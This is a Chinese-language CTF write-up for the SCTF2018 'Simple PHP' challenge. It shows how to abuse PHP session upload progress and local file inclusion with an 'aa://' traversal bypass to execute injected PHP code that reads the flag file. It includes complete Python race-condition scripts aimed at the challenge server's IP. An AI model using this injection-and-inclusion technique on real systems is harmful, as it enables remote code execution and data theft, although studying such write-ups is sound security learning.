以SCTF2018 BabySyc - Simple PHP为例子
官方正解:
https://www.cnblogs.com/iamstudy/articles/sctf2018_simple_php_web_writeup.html
session upload是非预期解
关于session opload给几个参考链接:
https://xz.aliyun.com/t/2148
http://php.net/manual/zh/session.upload-progress.php
http://skysec.top/2018/04/04/amazing-phpinfo/
image.png
文件包含读phpinfo
http://116.62.71.206:52872/?f=phpinfo.php
image.png
开了
session.upload_progress.enabled = on 说明可以覆盖session开了
clean up说明需要竞争竞争脚本附在最下方
image.png
image.png
这里实际上包含的session内容是:
admin|i:1;upload_progress_<?php echo file_get_contents("/tmp/flag_56CcE97QGNxDEXNpW3HY");?>|a:5:{s:10:"start_time";i:1529519759;s:14:"content_length";i:90736;s:15:"bytes_processed";i:5291;s:4:"done";b:0;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:6:"upload";s:4:"name";s:7:"tmp.jpg";s:8:"tmp_name";N;s:5:"error";i:0;s:4:"done";b:0;s:10:"start_time";i:1529519759;s:15:"bytes_processed";i:0;}}}
踩过的坑点
该题目调用了so来实现php的加解密,这里的文件包含调用了加密的index.php,所以要include也是include加密的php代码,但是这里的session只能控制<?php echo file_get_contents("/tmp/flag_56CcE97QGNxDEXNpW3HY");?>,最多也只是将session中的该片段进行加密,session其余的内容未加密也会导致解密出错
幸亏这题目为了让选手能调用php伪协议,留了个直接php解析,不需要加密的"后门",只判断了://
image.png
所以可以用payload绕过加解密步骤,来include session并直接调用php解析
http://116.62.71.206:52872/?f=aa://../../../../var/lib/php/sessions/sess_qc2kavokdjiiepu283hduivod2
image.png
image.png
SessionUpload.py
#!coding:utf-8
import requests
import time
url = 'http://116.62.71.206:52872/?f=login.php'
data = {'name':'admin','pass':'sctf2018_h656cDBkU2'}
r = requests.post(url,data = data)
PHPSESSID = r.cookies['PHPSESSID']
print 'input the PHPSESSID in include.py' +'\n' + PHPSESSID
time.sleep(10)
while 1:
url = 'http://116.62.71.206:52872/?f=upload_sctf2018_C9f7y48M75.php'
files = {
"PHP_SESSION_UPLOAD_PROGRESS" : (None,'<?php echo file_get_contents("/tmp/flag_56CcE97QGNxDEXNpW3HY");?>'),
"upload" : ("tmp.jpg", open("tmp.png", "rb"), "image/png"),
"submit" : (None,"submit")
}
#proxies = {'http':'http://127.0.0.1:8080'}
headers = {'Cookie':'PHPSESSID=' + PHPSESSID}
r = requests.post(url,files = files , headers = headers)
print r.text
print PHPSESSID
#开了cleanup,需要竞争,并且保持回话的session
include.py
#!coding:utf-8
import requests
PHPSESSID = 'qc2kavokdjiiepu283hduivod2'
while 1:
url = 'http://116.62.71.206:52872/?f=aa://../../../../var/lib/php/sessions/sess_' + PHPSESSID
print url
r = requests.get(url)
if 'SCTF' in r.text:
print r.text
break
